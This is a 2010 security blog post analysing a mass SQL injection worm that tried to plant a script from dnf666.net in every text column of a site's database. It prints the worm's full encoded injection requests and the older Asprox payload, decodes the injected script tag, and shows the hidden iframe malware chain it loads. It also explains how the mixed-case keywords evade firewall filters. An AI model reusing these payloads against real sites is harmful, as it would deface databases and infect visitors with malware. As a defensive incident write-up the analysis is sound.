SQL Injection worm with new injection domain dnf666.net

Monday, March 08, 2010 by Administrator

Our ZION SECURED WAMAF blocks a lot of attacks lately. Some attacks are worth investigating because they reveal new threats.

Most of you probably know about the Asprox worm? See http://matchent.com/wpress/?q=node/419

This weekend a bot attacked this blog, protected by ZION SECURED WAMAF:

GET /blog/2010/2/26//solutions.aspx?show=Solutions';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20
cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%
20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.
xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20f
EtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0
)%20bEgIn%20exec('UpDaTe20%5B'%2B@t%2B'5D%20sEt20%5B'%2B@c%2B'%5D=rtrim(c
onvert(varchar(8000),%5B'%2B@c%2B'%5D))%2BcAsT(0x3C736372697074207372633D
687474703A2F2F7777772E646E663636362E6E65742F752E6A733E3C2F7363726970743E%
20aS%20vArChAr(53))%20where%20%5B'%2B@c%2B'5D%20not%20like%20''%dnf666%''')%20fEtCh%20next%20FrOm%20
tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20t
AbLe_cursoR;-- HTTP/1.1
User-Agent: curl/7.19.7 (i386-pc-win32) libcurl/7.19.7
Host: www.zionsecurity.com
Accept: */*

The User Agent indicates that this is not a browser but the well-known tool curl,  running on Windows. This request wants to test if there is data in the database containing the string dnf666. Probably to see if the database is already infected with the malicious payload.

Because we don't reply with HTTP 500 error but redirect to the homepage instead, the worm attempts to inject its payload with the following GET request:

GET /blog/2010/2/26//solutions/code-review.aspx?show=Code+review';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR
%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,
sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20
(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20
b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_
cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20%5B'%2B@t%2B'%5D%20sEt%20%5B'%2B@c%2B'%5D=rtrim(convert(varchar(8000),%5B'%2B@c%2B'%5D))%2B
cAsT(0x3C736372697074207372633D687474703A2F2F7777772E646E663636362E6
E65742F752E6A733E3C2F7363726970743E%20aS%20vArChAr(53))%20where%20%5B'%2B@c%2B'%5D%20not%20like%20''%dnf666%''')%20fEtCh%20next%20FrOm%20tAbLe_
cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20
tAbLe_cursoR;-- HTTP/1.1
User-Agent: curl/7.19.7 (i386-pc-win32) libcurl/7.19.7
Host: www.zionsecurity.com
Accept: */*

Comparing this with the original payload that you can find here shows that the attack above is from a different worm then Asprox, http://chaptersinwebsecurity.blogspot.com/2008/07/asprox-silent-defacement.html:

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766172636
8617228323535292C40432076617263686172283430303029204445434C41524520546162
6C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622
E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220
776865726520612E69643D622E696420616E6420612E78747970653D27752720616E64202
8622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D
323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F7
2204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F20
40542C4043205748494C4528404046455443485F5354415455533D302920424547494E206
57865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727
223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646
F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27
272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B65202727252
23E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F
7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272
727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F
2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4
3415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);--

First of all:

The worm uses a mix of small and big caps, for example "dEcLaRe" or "fEtCh next FrOm tAbLe". This is to bypass web application firewalls or filters that trigger on DECLARE, FETCH NEXT FROM TABLE, .. so this is interesting.

The same way to inject the malicious payload is used with CAST:

3C736372697074207372633D687474703A2F2F7777772E646E663636362E6E65742F752
E6A733E3C2F7363726970743E

This can be ASCII HEX decoded using Burp Decoder, resulting in <script src=http://www.dnf666.net/u.js></script>.

Loading this script (dangerous!) returns:

try{__m}catch(e){__m=1;document.title=document.title.replace(/\<(\w|\W)*\>/,"");document.write("<iframe src=http://www.dnf666.net/cnzz.html width=0 height=0></iframe>");}

this returns:

<div style=display:none><script src="http://s10.cnzz.com/stat.php?id=1990191&web_id=1990191" language="JavaScript"></script></div>

Google has not listed this cnzz.com domain as malicious, but it was malicious in the past:

Safe Browsing
Diagnostic page for cnzz.com

What is the current listing status for cnzz.com?

This site is not currently listed as suspicious.

What happened when Google visited this site?

Of the 132 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-03-07, and the last time suspicious content was found on this site was on 2010-03-07.

Malicious software includes 224 scripting exploit(s), 22 exploit(s), 5 trojan(s).

Malicious software is hosted on 1 domain(s), including cmzz.3322.org/.

This site was hosted on 9 network(s) including AS17672 (CHINATELECOM), AS4847 (CNIX), AS4808 (CHINA169).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, cnzz.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 89 domain(s), including 360quan.com/, xsdyy.com/, phototh.com/.

Visiting this URL is blocked by ScanSafe:

The web resource http://s10.cnzz.com/stat.php?id=1990191&web_id=1990191 has been deemed by your administrator to be unsafe or unsuitable for you to access. The resource has been blocked. No further action is required. Reason: Adware was found during a scan of this file request

 

So it's basically the same like Asprox, injecting a script tag to a malicious file.

Googling for the string dnf666.net/u.js already reveals some victims, including some high profile sites!

Be careful when browsing!

1 comment(s) for “SQL Injection worm with new injection domain dnf666.net”

  1. Gravatar of Wayne
    Wayne Says:
    Monday, June 14, 2010Hi Guys, the dnf666 guys did it again recently, see: http://blog.armorize.com/2010/06/recent-evolution-of-mass-sql-injection.html

Leave comment:

Name:  
Email:  
Website:
Comment: